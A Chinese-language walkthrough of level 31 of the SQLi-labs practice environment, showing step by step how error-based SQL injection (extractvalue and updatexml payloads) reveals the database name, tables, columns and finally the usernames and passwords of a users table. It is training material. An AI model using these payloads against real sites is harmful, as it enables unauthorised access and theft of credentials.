SQL-labs的第31关——防火墙 报错注入（Get）

1、判断闭合方式

输入语句

?id=1\

，返回页面如下：

我们发现该网站会返回错误，在错误中我们看到\的后面时双引号加括号，所以该关的闭合方式是双引号加括号。

2、选择注入方式

我们输入万能密码

?id=1") or 1=1--+

，返回页面如下：

我们发现正常情况下，该网站会有回显。所以该网站适合union联合查询攻击。

并且，我们也发现该网站会返回错误，所以也适合报错注入。

我们这次选择报错注入。

3、爆破数据库名、用户名、版本

输入语句

?id=1") and extractvalue(1,concat('~',database(),'~',user(),'~',version(),'~'))--+

，返回页面如下：

4、爆破数据表名

输入语句

?id=1") and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),1)--+

，返回页面如下：

5、爆破字段名

输入语句

?id=1") and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),'~'))--+

，返回页面如下：

6、爆破字段内容

输入语句

?id=1") and updatexml(1,concat('~',(select group_concat(concat(id,'~',username,'~',password,'~')) from users),'~'),1)--+

，返回页面如下：

我们发现返回页面不完整，我们将语句改为：

?id=1") and updatexml(1,concat('~',mid((select group_concat(concat(id,'~',username,'~',password,'~')) from users),20,30),'~'),1)--+

，返回页面如下：

到此打靶结束